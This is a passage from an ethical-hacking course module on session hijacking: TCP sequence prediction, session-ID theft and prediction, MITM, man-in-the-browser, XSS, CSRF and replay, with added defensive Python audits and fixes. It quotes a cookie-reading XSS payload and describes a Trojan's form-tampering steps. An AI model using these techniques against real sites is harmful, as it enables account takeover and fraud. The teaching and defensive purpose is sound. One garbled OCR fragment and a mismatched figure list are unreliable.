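The model shows why the receiver cannot tell the two senders apart: TCP authenticates bytes by sequence number, not by origin, which is the reason the countermeasures later in this module rely on encryption and integrity protection above TCP rather than on the sequence space.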

Types of Session Hijacking
Session hijacking can be either active or passive, depending on the degree of involvement of the attacker. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive hijack monitors an ongoing session.

Passive Session Hijacking
In a passive attack, after hijacking a session, an attacker only observes and records all the traffic during the session. A passive attack uses sniffers on the network, allowing attackers to obtain information such as user IDs and passwords. The attacker can later use this information to log in as a valid user and enjoy the user's privileges. Password sniffing is the simplest attack to obtain raw access to a network. Countering this attack involves methods that range from identification schemes (for example, one-time password systems such as S/KEY) to ticketing identification (for example, Kerberos). These techniques help in protecting data from sniffing attacks, but they cannot protect against active attacks if the data are unencrypted or do not carry a digital signature.

Active Session Hijacking
In an active attack, an attacker takes over an existing session either by breaking the connection on one side of the conversation or by actively participating. An example of an active attack is a man-in-the-middle (MITM) attack. To perform a successful MITM attack, the attacker must guess the sequence number before the target responds to the server. On most current networks, sequence-number prediction does not work, because operating-system (OS) vendors use random values for the initial sequence number, which makes it difficult to predict sequence numbers.

Session Hijacking in OSI Model
There are two levels of session hijacking in the OSI model: the network level and the application level.

Network Level Hijacking
Network level hijacking is the interception of packets during the transmission between a client and server in a TCP/User Datagram Protocol (UDP) session. A successful attack provides the attacker with crucial information, which can be further used to attack application level sessions. Attackers most likely perform network level hijacking because they do not need to modify the attack on a per-web-application basis. This attack focuses on the data flow of the protocol shared across all web applications.

Application Level Hijacking
Application level hijacking involves gaining control over the Hypertext Transfer Protocol (HTTP) user session by obtaining the session IDs. At the application level, the attacker gains control of an existing session and can create new unauthorized sessions by using stolen data. In general, both occur together, depending on the system being attacked.

Spoofing vs. Hijacking
In blind hijacking, an attacker predicts the sequence numbers that a victim host sends to create a connection that appears to originate from the host, or a blind spoof. To understand blind hijacking, it is important to understand sequence-number prediction. TCP sequence numbers, which are unique per byte in a TCP session, provide flow control and data integrity. TCP segments provide the initial sequence number (ISN) as a part of each segment header. ISNs do not start at zero for each session. As part of the handshake process, each participant needs to state the ISN, and bytes are numbered sequentially from that point.
Blind session hijacking relies on the attacker's ability to predict or guess sequence numbers. An attacker is unable to spoof a trusted host on a different network and observe the reply packets because no route exists for the packets to return to the attacker's IP address. Moreover, the attacker is unable to resort to Address Resolution Protocol (ARP) cache poisoning because routers do not broadcast ARP across the Internet. Because the attacker is unable to observe the replies, they must anticipate the responses from the victim and prevent the host from sending a TCP/RST packet to the victim. The attacker predicts sequence numbers that the remote host expects from the victim and then hijacks the communication. This method is useful to exploit the trust relationships between users and remote machines.
In a spoofing attack, an attacker pretends to be another user or machine (victim) to gain access. Instead of taking over an existing active session, the attacker initiates a new session using the victim's stolen credentials. Simple IP spoofing is easy to perform and is useful in various attack methods. To create new raw packets, the attacker must have root access on the machine. However, to establish a spoofed connection using this session hijacking technique, an attacker must know the sequence numbers used by a target machine. IP spoofing forces the attacker to

ical andCountermensores
Mackin ©by E-Comel
Copyright
theNSN,Whenan attackerusesblindhijacking
forecast theycannot view
to senda command,
the response.
In the case of IP spoofing without a session hijack, guessing the sequence number is unnecessary because no currently open session exists with that IP address. In a session hijack, the traffic returns to the attacker only if source routing is used. Source routing is a process that allows the sender to specify the route to be taken by an IP packet to the destination. The attacker performs source routing and then sniffs the traffic as it passes by the attacker. In session spoofing, captured authentication credentials are used to establish a session. In contrast, active hijacking eclipses a pre-existing session. As a result of this attack, a legitimate user may lose access or the normal functionality of their established Telnet session because an attacker hijacks the session and acts with the user's privileges. Because most authentication mechanisms are enforced only at the initiation of a session, the attacker can gain access to a target machine without authentication while a session is in progress.

Another method is to use source routed IP packets. This type of MITM attack allows an attacker to become a part of the target-host conversation by deceptively guiding IP packets to pass through their system.
Session hijacking is the process of taking over an existing active session. An attacker relies on a legitimate user to make a connection and authenticate. Session hijacking is more difficult than IP address spoofing. In session hijacking, John (an attacker) would seek to insert himself into a session that James (a legitimate user) already had set up with \\Mail. John would wait until James establishes a session, displace James from the established session by some means, such as a DoS attack, and then pick up the session as though he were James. Subsequently, John would send a scripted set of packets to \\Mail and observe the responses. For this purpose, John needs to know the sequence number in use when he hijacked the session. To calculate the sequence number, he must know the ISN and the number of packets involved in the exchange process.

Successful session hijacking is difficult without the use of known tools and is only possible when several factors are under the attacker's control. Knowledge of the ISN is the least of John's challenges. For instance, John needs a method to displace James from the active session as well as a method to know the exact status of James's session at the moment that James is displaced. Both these tasks require John to have far more knowledge and control over the session than would normally be possible.

However, IP address spoofing attacks can only be successful if an attacker uses IP addresses for authentication. They cannot perform IP address spoofing or session hijacking if per-packet integrity checking is executed. In the same manner, IP address spoofing or session hijacking is not possible if the session uses encryption methods such as Secure Sockets Layer (SSL) or Point-to-Point Tunneling Protocol (PPTP). Consequently, the attacker cannot participate in the key exchange.

Figure 11.5: Spoofing attack (James (victim) logs on to the server with his credentials; John (attacker))
Figure: John (attacker) predicts the sequence and kills James' (victim) connection
In summary, the hijacking of non-encrypted TCP communications requires the presence of non-encrypted session-oriented traffic, the ability to recognize TCP sequence numbers from which the next sequence number (NSN) can be predicted, and the ability to spoof a host's media access control (MAC) or IP address to receive communications that are not destined for the attacker's host. If the attacker is on the local segment, they can sniff and predict the ISN + 1 number and route the traffic back to them by poisoning the ARP caches on the two legitimate hosts participating in the session.
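Blind hijacking, as described above, stands or falls on whether the ISN a host will use next can be forecast. The following is an added example, not part of the course material: a small audit that samples the ISNs a stack emits on successive connections and scores how much the differences between consecutive samples vary, the idea behind nmap's TCP sequence predictability test. The thresholds and the three sample ISN series are constructed for the example (a fixed 64000-per-connection step stands in for early BSD-style stacks, the random series for a modern one).

```python
"""ISN predictability audit (added example; thresholds and samples are constructed)."""
import random
import statistics

MOD32 = 2 ** 32


def isn_deltas(isns):
    """Wrap-aware differences between consecutive 32-bit ISNs, mapped to a signed range
    so that a small positive step and a small negative step both look small."""
    deltas = []
    for a, b in zip(isns, isns[1:]):
        d = (b - a) % MOD32
        deltas.append(d - MOD32 if d >= MOD32 // 2 else d)
    return deltas


def delta_spread(isns):
    """Population standard deviation of the deltas: 0 means a constant increment,
    values around 2**31 / sqrt(3) mean uniformly random 32-bit ISNs."""
    deltas = isn_deltas(isns)
    if len(deltas) < 2:
        raise ValueError("need at least three ISN samples")
    return statistics.pstdev(deltas)


def classify_isns(isns):
    """Coarse verdict for the sampled stack (the cut-offs are this example's own)."""
    spread = delta_spread(isns)
    if spread == 0:
        return "constant increment: trivially predictable"
    if spread < 2 ** 20:
        return "low variance: predictable with a few samples"
    return "high variance: not practically predictable"


def constant_increment_isns(start=1_000_000, step=64000, count=10):
    """Constructed: a stack that bumps the ISN by a fixed amount per connection."""
    return [(start + i * step) % MOD32 for i in range(count)]


def jittered_isns(start=1_000_000, step=64000, count=10, seed=7):
    """Constructed: fixed step plus a little noise, still easy to bracket."""
    rng = random.Random(seed)
    return [(start + i * step + rng.randrange(0, 512)) % MOD32 for i in range(count)]


def random_isns(count=10, seed=7):
    """Constructed: uniformly random 32-bit ISNs, as a modern stack produces.
    A fixed seed keeps the example reproducible; real stacks draw from a CSPRNG."""
    rng = random.Random(seed)
    return [rng.getrandbits(32) for _ in range(count)]


if __name__ == "__main__":
    for name, sample in [("fixed step", constant_increment_isns()),
                         ("fixed step + jitter", jittered_isns()),
                         ("random", random_isns())]:
        print(f"{name:20s} spread={delta_spread(sample):.0f} -> {classify_isns(sample)}")
```

In practice the samples come from the SYN/ACKs a host returns to a series of connection attempts you make to your own system; a constant or low-variance spread is the condition under which the ISN + 1 guess described above has a realistic chance, and is the reason modern stacks randomize the ISN per connection.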

Module Flow
01 Session Hijacking Concepts
02 Application Level Session Hijacking
Network Level Session Hijacking
05 Countermeasures

Application Level Session Hijacking
In a session hijacking attack, a session token is stolen or a valid session token is predicted to gain unauthorized access. A session token can be compromised in various ways:
Session sniffing
Predictable session token
Man-in-the-middle attack
Man-in-the-browser attack
Cross-site scripting (XSS) attack
Cross-site request forgery attack
Session replay attack
Session fixation attack
CRIME attack
Forbidden attack
Session donation attack

Application Level Session Hijacking
In application level hijacking, the attacker obtains the session IDs to gain control over an existing session or to create a new unauthorized session. This section discusses application level session hijacking and various methods to compromise the session token, such as session sniffing and the use of predictable session tokens.

In application level session hijacking, an attacker steals or predicts a valid session to gain unauthorized access to a web server. Usually, network level and application level session hijacking occur together because a successful network level session hijack provides an attacker with ample information to perform application level session hijacking. Application level session hijacking relies on HTTP sessions.

An attacker implements various techniques such as stealing, guessing, and brute forcing to obtain a valid session ID, which helps in acquiring control over a valid user's session while it is in progress.

Stealing: Attackers use different techniques to steal session IDs. An attacker can steal the session key through physical access by, for example, acquiring the files containing session IDs or memory contents of either the user's system or the server. The attacker can also use sniffing tools such as Wireshark or SteelCentral Packet Analyzer to sniff the traffic between the client and server to extract the session IDs from the packets.

Guessing: An attacker attempts to guess the session IDs by observing session variables. In the case of session hijacking, the range of session ID values that can be guessed is limited. Thus, guessing techniques are effective only when servers use weak or flawed session-ID generation mechanisms.

Brute forcing: In the brute-force technique, an attacker obtains session IDs by attempting all possible permutations of session ID values until finding one that works. An attacker using a digital subscriber line (DSL) can generate up to 1,000 session IDs per second. This technique is most useful when the algorithm that produces session IDs is non-random.

http://www.mysite.com/view/VW30422101518909
http://www.mysite.com/view/VW30422101520803
http://www.mysite.com/view/VW30422101522507
Figure 11.7: Brute-forcing attack on the session ID of a user

As shown in the above figure, a legitimate user connects to a server with session ID VW30422101522507. Employing various combinations such as VW30422101518909 and VW30422101520803, an attacker attempts to brute force the session ID in the hope of eventually arriving at the correct session ID. Once the attacker obtains the correct

session ID, they gain complete access to the user's data and can perform operations on behalf of the legitimate user.

Note: A session ID brute-forcing attack is known as a session prediction attack if the predicted range of values for a session ID is very small.

A session token can be compromised in various ways:
Session sniffing
Predictable session token
Man-in-the-middle (MITM) attack
Man-in-the-browser attack
Cross-site scripting (XSS) attack
Cross-site request forgery attack
Session replay attack
Session fixation attack
CRIME attack
Forbidden attack
Session donation attack
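The stealing, guessing and brute-forcing techniques above all come down to the same server-side question: how the session ID is generated, and whether the server notices a client trying many of them. The following is an added example, not code from the course: a counter-based generator of the VW30422101518909 shape used in Figure 11.7 beside one backed by the operating system's CSPRNG, the size of each search space, and a detector that flags a client presenting many session IDs the server does not know. The log lines, the IP addresses and the alert threshold are constructed for the example; 1,000 guesses per second is the DSL rate quoted in the text.

```python
"""Session-ID generation and brute-force detection (added example; log data constructed)."""
import math
import re
import secrets
from collections import Counter


class SequentialSessionIds:
    """Weak generator: fixed prefix plus a zero-padded counter. The size of the space is
    irrelevant here, because the next ID is always the previous one plus one."""

    def __init__(self, prefix="VW", start=30422101518909, width=14):
        self.prefix, self.counter, self.width = prefix, start, width

    def issue(self):
        self.counter += 1
        return f"{self.prefix}{self.counter:0{self.width}d}"


def random_session_id(nbytes=32):
    """Hardened generator: 32 random bytes (256 bits), URL-safe base64 without padding."""
    return secrets.token_urlsafe(nbytes)


def search_space_bits(alphabet_size, length):
    """log2 of the number of tokens of `length` symbols drawn from `alphabet_size` symbols."""
    return length * math.log2(alphabet_size)


def expected_guess_seconds(bits, guesses_per_second=1000):
    """Expected time to hit one valid token by uniform guessing when a single token is
    valid: half the space divided by the guess rate."""
    return (2 ** bits / 2) / guesses_per_second


# Constructed server log, one request per line: "<client> <method> <path> <status> <reason>".
# 10.0.0.7 walks through consecutive IDs as in Figure 11.7; 10.0.0.9 holds a valid session.
ACCESS_LOG = "\n".join(
    [f"10.0.0.7 GET /view/VW{30422101518909 + i} 403 unknown-session" for i in range(25)]
    + ["10.0.0.9 GET /view/VW30422101522507 200 ok",
       "10.0.0.9 GET /account 200 ok",
       "10.0.0.12 GET /view/VW30422101522508 403 unknown-session"]
)

LINE_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) (?P<reason>\S+)$")


def unknown_session_counts(log_text):
    """Requests per client that presented a session ID the server did not know."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m["reason"] == "unknown-session":
            counts[m["ip"]] += 1
    return counts


def flag_guessers(log_text, threshold=10):
    """Clients at or above `threshold` unknown-session hits: candidates for rate limiting."""
    return sorted(ip for ip, n in unknown_session_counts(log_text).items() if n >= threshold)


if __name__ == "__main__":
    gen = SequentialSessionIds()
    print("sequential:", gen.issue(), gen.issue())
    print("random    :", random_session_id())
    bits14 = search_space_bits(10, 14)
    print(f"14 decimal digits: {bits14:.1f} bits, "
          f"{expected_guess_seconds(bits14) / 86400 / 365:.0f} years at 1000/s if uniform")
    print(f"43 base64 chars  : {search_space_bits(64, 43):.0f} bits")
    print("flagged:", flag_guessers(ACCESS_LOG))
```

The search-space arithmetic makes the note above concrete: a 14-digit counter looks large (about 46 bits) but a sequential issuer hands out IDs a step apart, so an attacker who holds one valid ID needs almost no guesses, which is why the detector counts unknown IDs per client rather than trusting the space size.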

Compromising Session IDs Using Sniffing and by Predicting Session Token

Compromising Session IDs by Sniffing: An attacker uses a sniffer to capture a valid session token or session ID. The attacker then uses the valid token session to gain unauthorized access to the web server.

Compromising Session IDs by Predicting Session Token: Attackers can predict session IDs generated by weak algorithms and impersonate a website user. Attackers analyze the variable sections of session IDs to determine the existence of a pattern. The analysis is performed manually or using various cryptanalytic tools. Attackers collect a high number of simultaneous session IDs to gather samples in the same time window and keep the variable constant.
Compromising Session IDs Using Sniffing
A web server identifies a user's connection through a unique session ID (also known as a session token). The web server sends a session token to the client browser after the successful authentication of client login. Usually, a session token comprises a string of variable width that is useful in various ways, such as in the header of an HTTP request (cookie), in a URL, or in the body of an HTTP request.

An attacker uses packet sniffing tools such as Wireshark and SteelCentral Packet Analyzer to intercept the HTTP traffic between a victim and web server. The attacker then analyzes the data in the captured packets to identify valuable information such as session IDs and passwords. Once the session ID is determined, the attacker masquerades as the victim and sends the session ID to the web server before the victim does. The attacker uses the valid token session to gain unauthorized access to the web server. In this manner, the attacker takes control over an existing legitimate session.

Figure 11.8: Prediction of session ID by sniffing

Compromising Session IDs by Predicting Session Token
A session ID is tagged as proof of an authenticated session established between a user and web server. Thus, if an attacker can guess or predict the session ID of the user, fraudulent activity is possible. Session prediction enables an attacker to bypass the authentication schema of an application. Usually, attackers can predict session IDs generated by weak algorithms and impersonate a website user. Attackers analyze a variable section of session IDs to determine the existence of a pattern. This analysis is performed either manually or by using various cryptanalytic tools.

An attacker collects a high number of simultaneous session IDs to gather samples in the same time window and keep the variable constant. First, the attacker collects some valid session IDs that are useful in identifying authenticated users. The attacker then studies the session ID structure, the information used to generate it, and the algorithm used by the web application to secure it. From these findings, the attacker can predict the session ID.

Attackers can also guess session IDs by using a brute-force technique, in which they generate and test different session ID values until they succeed in gaining access to the application.

How to Predict a Session Token

Most web servers use custom algorithms or a predefined pattern to generate session IDs. An attacker guesses the unique value or deduces the session ID to hijack the session.

An attacker captures several session IDs and analyzes the pattern:
http://www.certifiedhacker.com/view/JBEX18082019152020
http://www.certifiedhacker.com/view/JBEX18082019153020
http://www.certifiedhacker.com/view/JBEX18082019160020
http://www.certifiedhacker.com/view/JBEX18082019164020

At 16:25:55 on August 23, 2019, the attacker can successfully predict the session ID: http://www.certifiedhacker.com/view/JBEX23082019162555
How to Predict a Session Token
Most web servers generate session IDs using custom algorithms or a pre-defined pattern that might simply increase static numbers, whereas others use more complex procedures such as factoring in time and other computer-specific variables. Thus, attackers can identify session IDs generated in the following ways:
Embedding in the URL, which is received by a GET request in the application when the links embedded within a page are clicked by clients
Embedding in a form as a hidden field, which is submitted to the HTTP's POST command
Embedding in cookies on the client's local machine

An attacker guesses the unique session value or deduces the session ID to hijack the session. As shown in the below figure, an attacker first captures several session IDs and analyzes the pattern.

http://www.certifiedhacker.com/view/JBEX18082019152020
http://www.certifiedhacker.com/view/JBEX18082019153020
http://www.certifiedhacker.com/view/JBEX18082019160020
http://www.certifiedhacker.com/view/JBEX18082019160020
(JBEX: constant; 18082019: date; 160020: time)
Figure 11.9: Sample sessions captured by an attacker

On analyzing the pattern, at 16:25:55 on August 23, 2019, the attacker successfully predicts the session ID, as shown in the below figure.

http://www.certifiedhacker.com/view/JBEX23082019162555
(JBEX: constant; 23082019: date; 162555: time)
Figure 11.10: Session ID predicted by the attacker

Now, the attacker can mount an attack through the following steps.
The attacker acquires the current session ID and connects to the web application.
The attacker implements a brute-force technique or calculates the next session ID.
The attacker modifies the current value in the cookie/URL/hidden form field and assumes the next user's identity.
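The analysis in Figures 11.9 and 11.10 (split each ID into a constant part and a variable part, then ask what the variable part encodes) is also how a defender audits the IDs their own server issues. The following is an added example, not part of the course material, that performs that audit in code: it searches for the shortest constant prefix after which every sampled ID parses as a DDMMYYYYHHMMSS timestamp, and otherwise falls back to a per-character entropy estimate of the variable section. The four captured IDs are those of Figure 11.9; the random-looking IDs and the entropy threshold are constructed for the example.

```python
"""Structural audit of session IDs (added example; RANDOM_IDS and threshold constructed)."""
import math
from collections import Counter
from datetime import datetime

# The IDs captured in Figure 11.9.
CAPTURED_IDS = [
    "JBEX18082019152020",
    "JBEX18082019153020",
    "JBEX18082019160020",
    "JBEX18082019164020",
]

# Constructed: what IDs from a CSPRNG-backed generator look like.
RANDOM_IDS = [
    "q7Zc3mP9xL2vB8nK",
    "T4wR1yH6sJ0aD5eF",
    "Ub2oX9gN7kM3pQ1i",
    "Yh5tV8cL4zW2sE6r",
]


def common_prefix(ids):
    """Longest prefix shared by every ID in the sample."""
    prefix = ids[0]
    for s in ids[1:]:
        while not s.startswith(prefix):
            prefix = prefix[:-1]
    return prefix


def parse_timestamp(s, fmt="%d%m%Y%H%M%S"):
    """datetime if `s` is exactly a date-time in `fmt`, else None."""
    try:
        return datetime.strptime(s, fmt)
    except ValueError:
        return None


def timestamp_split(ids, fmt="%d%m%Y%H%M%S"):
    """Shortest constant prefix after which every ID parses as a timestamp.
    Scanning from the shortest prefix matters: IDs issued on the same day share
    more than just the constant section, so the longest common prefix eats the date."""
    longest = common_prefix(ids)
    for k in range(len(longest) + 1):
        stamps = [parse_timestamp(s[k:], fmt) for s in ids]
        if all(stamps):
            return ids[0][:k], stamps
    return None


def bits_per_symbol(strings):
    """Shannon entropy per character over the pooled variable sections."""
    pooled = "".join(strings)
    counts = Counter(pooled)
    total = len(pooled)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def audit_session_ids(ids, min_bits_per_symbol=3.0):
    """Verdict on a sample of IDs plus the evidence behind it."""
    split = timestamp_split(ids)
    if split is not None:
        prefix, stamps = split
        return {"verdict": "predictable",
                "reason": "variable section is a DDMMYYYYHHMMSS timestamp",
                "constant": prefix,
                "first_seen": stamps[0].isoformat()}
    prefix = common_prefix(ids)
    bits = bits_per_symbol([s[len(prefix):] for s in ids])
    if bits < min_bits_per_symbol:
        return {"verdict": "predictable", "reason": f"low entropy ({bits:.2f} bits/char)",
                "constant": prefix}
    return {"verdict": "no obvious structure", "reason": f"{bits:.2f} bits/char",
            "constant": prefix}


if __name__ == "__main__":
    print(audit_session_ids(CAPTURED_IDS))
    print(audit_session_ids(RANDOM_IDS))
```

A sample of four IDs is enough to expose a timestamp layout, as it was in the figure; the entropy fallback needs more samples before its number means much, so treat a "no obvious structure" verdict on a handful of IDs as "nothing found", not as a clean bill of health.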

Compromising Session IDs Using Man-in-the-Middle Attack

The man-in-the-middle attack is used to intrude into an existing connection between systems and to intercept the messages being exchanged.
After the interception of the TCP connection, an attacker can read, modify, and insert fraudulent data.
In the case of an HTTP transaction, the TCP connection between the client and the server is the target.
Compromising Session IDs Using Man-in-the-Middle Attack
A man-in-the-middle (MITM) attack is used to intrude into an existing connection between systems and to intercept messages being transmitted. In this attack, attackers use different techniques and split a TCP connection into two: a client-to-attacker connection and an attacker-to-server connection. After the successful interception of a TCP connection, an attacker can read, modify, and insert fraudulent data into the intercepted communication. In the case of an HTTP transaction, the TCP connection between the client and server is the target.

Figure 11.11: Prediction of session ID using a man-in-the-middle (MITM) attack

Compromising Session IDs Using Man-in-the-Browser Attack

The man-in-the-browser attack uses a Trojan horse to intercept the calls between the browser and its security mechanisms or libraries.
It works with an already installed Trojan horse that acts between the browser and its security mechanisms.
Its main objective is to cause financial deceptions by manipulating transactions of Internet banking systems.

Steps to Perform Man-in-the-Browser Attack
Compromising Session IDs Using Man-in-the-Browser Attack
A man-in-the-browser attack is similar to an MITM attack. The difference between the two is that a man-in-the-browser attack uses a Trojan horse to intercept and manipulate calls between a browser and its security mechanisms or libraries. An attacker positions a previously installed Trojan between the browser and its security mechanism, and the Trojan can modify web pages and transaction content or insert additional transactions. All of the Trojan's activities are invisible to both the user and web application.

The main objective of this attack is financial theft by manipulating transactions made using Internet banking systems. A man-in-the-browser attack can succeed even in the presence of security mechanisms such as SSL, public key infrastructure (PKI), and two-factor authentication because all the expected controls and security mechanisms would seem to function normally.

Steps to Perform Man-in-the-Browser Attack:
The Trojan first infects the computer's software (OS or application).
The Trojan installs malicious code (extension files) and saves it in the browser configuration.
After the user restarts the browser, the malicious code in the form of extension files is loaded.
The extension files register a handler for every visit to a webpage.
When a page is loaded, the extension matches its URL with a list of known sites targeted for attack.
The user logs in securely to the website.
The extension registers a button event handler when a specific page load is detected with a specific pattern and compares it with its targeted list.
When the user clicks on the button, the extension uses the Document Object Model (DOM) interface and extracts all the data from all form fields and modifies the values.
The browser sends the form and modified values to the server.
The server receives the modified values but cannot distinguish between the original and modified values.
After the server performs the transaction, a receipt is generated.
Now, the browser receives the receipt for the modified transaction.
The browser displays the receipt with the original details.
The user believes that the original transaction was received by the server without any interception.

Compromising Session IDs Using Client-side Attacks

Cross-Site Scripting (XSS): XSS enables attackers to inject malicious client-side scripts into the web pages viewed by other users.
Malicious JavaScript Codes: A malicious script does not generate any warning, but captures session tokens in the background and sends them to the attacker.
Trojans: Trojans change the proxy settings in the browser to send all the sessions through the attacker's machine.
Compromising Session IDs Using Client-side Attacks
Client-side attacks target vulnerabilities in client applications that interact with a malicious server or process malicious data. Depending on the nature of vuln­erabilities, an attacker can exploit an application by sending an email with a malicious link or otherwise tricking a user into visiting a malicious website. Vulnerable client-side applications include unprotected websites, Java Runtime Environment, and browsers; of these, browsers are the major target. Client-side attacks occur when clients establish connections with malicious servers and process potentially harmful data from them. If no interaction occurs between the client and server, then there is no scope for a client-side attack. One such example is running a File Transfer Protocol (FTP) client without establishing a connection to an FTP server. In the case of instant messaging, the application is configured in such a way that it makes clients log in to a remote server, making it susceptible to client-side attacks. The following client-side attacks can be used to compromise session IDs.

Cross-site scripting (XSS): XSS enables attackers to inject malicious client-side scripts into web pages viewed by other users.
Malicious JavaScript codes: An attacker can embed in a web page a malicious script that does not generate any warning but captures session tokens in the background and sends them to the attacker.
Trojans: A Trojan horse can change the proxy settings in the user's browser to send all sessions through an attacker's machine.

Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack

An attacker sends a crafted link to the victim with malicious JavaScript; when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker.
Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack
A cross-site script attack is a client-side attack in which the attacker compromises a session token by using malicious code or programs. This type of attack occurs when a dynamic web page receives malicious data from the attacker and executes it on the user's system.

Websites that create dynamic pages do not have control over how the clients read their output. Thus, attackers can insert a malicious JavaScript, ActiveX, VBScript, Hypertext Markup Language (HTML), or Flash applet into a vulnerable dynamic page. That page then executes the script on the user's machine and collects personal information of the user, steals cookies, redirects users to unexpected web pages, or executes any malicious code on the user's system.

As shown in the below figure, a user first establishes a valid session with a server. An attacker sends a crafted link to the victim with malicious JavaScript. When the user clicks on the link, the JavaScript runs automatically and performs the instructions set by the attacker. The result displays the current session ID of the user. Using the same technique, the attacker can create specific JavaScript code that fetches the user's session ID:

<SCRIPT>alert(document.cookie);</SCRIPT>

Thereafter, the attacker uses the stolen session ID to establish a valid session with the server.
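The alert(document.cookie) script above only yields a session ID when two conditions hold: the page reflects attacker-supplied text into its HTML unencoded, and the session cookie is readable from script. The following is an added example, not part of the course material, showing the reflecting handler in both forms and a Set-Cookie line that marks the session cookie HttpOnly (plus Secure and SameSite), so that a script which does run still cannot read it. The handler names, the query value and the session ID are constructed for the example.

```python
"""Output encoding and HttpOnly cookies (added example; names and values constructed)."""
import html
import re
from http.cookies import SimpleCookie

# The script from the text, used here only as test input; nothing executes it.
XSS_PROBE = "<SCRIPT>alert(document.cookie);</SCRIPT>"

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_results_vulnerable(query):
    """Reflects the query value straight into the page: the browser parses any tags in it."""
    return f"<p>Results for {query}</p>"


def render_results_safe(query):
    """Encodes <, >, &, and quotes: the browser shows the text and parses no tags."""
    return f"<p>Results for {html.escape(query, quote=True)}</p>"


def has_live_script_tag(markup):
    """True if a <script> element would be parsed from this markup."""
    return SCRIPT_TAG.search(markup) is not None


def session_cookie_header(session_id, secure=True):
    """Set-Cookie line for the session ID. HttpOnly keeps it out of document.cookie,
    Secure keeps it off cleartext HTTP, SameSite=Lax withholds it on cross-site POSTs."""
    jar = SimpleCookie()
    jar["SESSIONID"] = session_id
    jar["SESSIONID"]["httponly"] = True
    jar["SESSIONID"]["secure"] = secure
    jar["SESSIONID"]["samesite"] = "Lax"
    jar["SESSIONID"]["path"] = "/"
    return jar.output(header="Set-Cookie:").strip()


def cookie_flags(header_line):
    """Attribute names present on a Set-Cookie line, lower-cased, for a review or scanner check."""
    attrs = [p.strip() for p in header_line.split(":", 1)[1].split(";")]
    return {a.split("=", 1)[0].lower() for a in attrs[1:]}


if __name__ == "__main__":
    print(render_results_vulnerable(XSS_PROBE))
    print(render_results_safe(XSS_PROBE))
    print(session_cookie_header("abc123-constructed"))
```

Encoding on output is the fix for the injection itself; HttpOnly is the fallback that limits what an injected script can reach, and the flag check is the kind of test to put in a pipeline so a cookie that loses the attribute in a refactor is caught.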

Compromising Session IDs Using Client-side Attacks: Cross-site Request Forgery Attack

The Cross-site Request Forgery (CSRF) attack exploits the victim's active session with a trusted site to perform malicious activities.
Compromising Session IDs Using Client-side Attacks: Cross-site Request Forgery Attack
Cross-site request forgery (CSRF), also known as a one-click attack or session riding, is an attack in which the attacker exploits the victim's active session with a trusted site to perform malicious activities such as item purchases and the modification or retrieval of account information. In CSRF web attacks, the attacker creates a host form, containing malicious information, and sends it to the authorized user. The user fills in the form and sends it to the web server. Because the data originates from a trusted user, the web server accepts the data. Unlike an XSS attack, which exploits the trust a user has for a particular website, CSRF exploits the trust that a website has on a user's browser. A CSRF attack involves the following steps.
The attacker hosts a web page with a form that appears legitimate. This page already contains the attacker's request.
A user, believing the form to be the original, enters a login and password.
Once the user completes the form, that page is submitted to the real site.
The real site's server accepts the form, assuming that it was sent by the user based on the authentication credentials.
In this manner, the server accepts the attacker's request.
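The steps above succeed because the browser attaches the victim's session cookie to whatever the attacker's page submits. A per-session secret that the attacker's page cannot read, embedded in the real site's form and checked on every state-changing request, breaks that: the forged submission carries the cookie but not the token. The following is an added example, not code from the course, with an in-memory session store, a transfer handler that enforces the token, and the two submissions side by side; all names, values and the request layout are constructed.

```python
"""Synchronizer-token CSRF check (added example; store, handler and requests constructed)."""
import hmac
import secrets


class SessionStore:
    def __init__(self):
        self._sessions = {}

    def login(self, user):
        """Create a session; the CSRF token is generated once per session, next to the SID."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)


def render_transfer_form(store, sid):
    """The real site's form carries the session's token as a hidden field."""
    session = store.get(sid)
    return ('<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf" value="{session["csrf"]}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def handle_transfer(store, request):
    """request = {"cookie_sid": str or None, "form": {...}}; returns (status, message)."""
    session = store.get(request.get("cookie_sid"))
    if session is None:
        return 401, "no session"
    submitted = request["form"].get("csrf", "")
    # constant-time comparison so the check itself leaks nothing about the token
    if not hmac.compare_digest(submitted, session["csrf"]):
        return 403, "missing or invalid CSRF token"
    form = request["form"]
    return 200, f'{session["user"]} sent {form["amount"]} to {form["to"]}'


def forged_request(sid):
    """What the attacker-hosted page can produce: the browser adds the cookie, but the page
    cannot read the token out of the real site's session, so the field is absent."""
    return {"cookie_sid": sid, "form": {"to": "attacker", "amount": "1000"}}


def legitimate_request(store, sid):
    """Submission of the real form: the browser posts the hidden token back."""
    token = store.get(sid)["csrf"]
    return {"cookie_sid": sid, "form": {"to": "landlord", "amount": "700", "csrf": token}}


if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("james")
    print(render_transfer_form(store, sid))
    print(handle_transfer(store, forged_request(sid)))
    print(handle_transfer(store, legitimate_request(store, sid)))
```

The token must be unpredictable and tied to the session, and it must be checked on every request that changes state, not only on the form that displays it; a SameSite cookie attribute is a useful second layer, but the token is what makes the check independent of browser behaviour.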

Compromising Session IDs Using Session Replay Attacks

In a session replay attack, the attacker listens to the conversation between the user and the server and captures the authentication token of the user.
Once the authentication token is captured, the attacker replays the request to the server with the captured authentication token and gains unauthorized access to the server.
Compromising Session IDs Using Session Replay Attacks
In a session replay attack, the attacker captures the authentication token of a user by listening to a conversation between the user and server. Once the authentication token is captured, the attacker replays the authentication request to the server with the captured authentication token to dodge the server; consequently, they gain unauthorized access to the server. A session replay attack involves the following steps.
The user establishes a connection with the web server.
The server asks the user for authentication information as identity proof.
The user sends authentication tokens to the server. In this step, an attacker captures the authentication token of the user by eavesdropping on the conversation between the user and server.
Once the authentication token is captured, the attacker replays the request to the server with the captured authentication token and gains unauthorized access to the server.

Figure 11.15: Prediction of session ID using session replay attack
